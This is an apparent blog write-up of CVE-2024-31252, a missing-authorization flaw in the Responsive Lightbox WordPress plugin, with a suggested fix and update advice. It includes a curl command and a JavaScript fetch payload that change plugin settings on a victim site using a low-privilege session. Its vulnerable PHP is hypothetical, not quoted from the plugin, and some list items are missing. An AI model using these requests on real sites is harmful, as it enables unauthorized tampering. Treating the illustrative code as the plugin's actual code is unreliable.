CVE-2024-31252 - Exploiting Missing Authorization in dFactory Responsive Lightbox (<=2.4.6)

WordPress plugins are a favorite target for attackers, and missing authorization bugs can lead to devastating consequences. CVE-2024-31252 is one such critical vulnerability, identified in the incredibly popular dFactory Responsive Lightbox plugin. This vulnerability affects all versions up to and including 2.4.6, where key admin functions lack proper authorization checks. Here, we'll explain how the bug works, show proof-of-concept code, and discuss how you can protect your site.

What Is dFactory Responsive Lightbox?

Responsive Lightbox by dFactory is a WordPress plugin that adds customizable lightbox popups for image galleries, making them interactive and mobile-friendly. It's widely used, which dramatically increases its impact when a vulnerability is found.

What Happened?

The core problem is the missing authentication for certain actions. This means that users—even those with no special permissions—could access functions supposed to be restricted to administrators.

Often, in WordPress plugins, developers forget to add capability checks like current_user_can(). Without this, any logged-in user (and sometimes unauthenticated visitors) can access sensitive AJAX or admin panel features.

Exploit Details

Here's a step-by-step look at how an attacker might exploit this bug.

Suppose the plugin registers an AJAX action in PHP like this

// In responsive-lightbox.php
add_action('wp_ajax_rl_update_settings', 'rl_update_settings_callback');

function rl_update_settings_callback() {
    // Oops! No check for user capabilities!
    update_option('responsive_lightbox_settings', $_POST['settings']);
    wp_send_json_success();
}

What's missing:
There is NO call to check if the requester is an admin. Anyone logged in can POST data to this handler and change plugin settings.

From the browser console or a tool like curl or Postman, an attacker could send

curl \
  -X POST \
  -d "action=rl_update_settings&settings[lightbox_theme]=evil_theme" \
  -b "wordpress_logged_in_xxx=..." \
  https://victim.site/wp-admin/admin-ajax.php

> *With the right session cookie (even a subscriber-level login), you can change critical options.*

Or, by crafting a JavaScript payload with XHR or fetch

fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  credentials: 'include',
  body: new URLSearchParams({
    action: 'rl_update_settings',
    'settings[lightbox_theme]': 'evil_theme'
  }),
})
  .then(response => response.json())
  .then(data => console.log(data));

Step 3: Impact

- Configuration changes: Attackers can change the Lightbox appearance or load malicious external scripts.

Proper Fix: Developers must verify user capabilities before allowing sensitive actions

function rl_update_settings_callback() {
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Unauthorized', 403);
        exit;
    }
    update_option('responsive_lightbox_settings', $_POST['settings']);
    wp_send_json_success();
}

Always check:

References

- CVE-2024-31252 at MITRE
- dFactory Responsive Lightbox WordPress Plugin
- Public advisory on WPScan
- OWASP Authorization Cheat Sheet

Conclusion

Simple mistakes like missing authorization checks can lead to full site compromise. If you run the affected plugin, update now or disable it until you can. As always, keep plugins up to date, review their security history before installing, and follow reputable advisories for the latest threats.

Timeline

Published on: 06/09/2024 12:15:10 UTC
Last modified on: 06/10/2024 02:52:08 UTC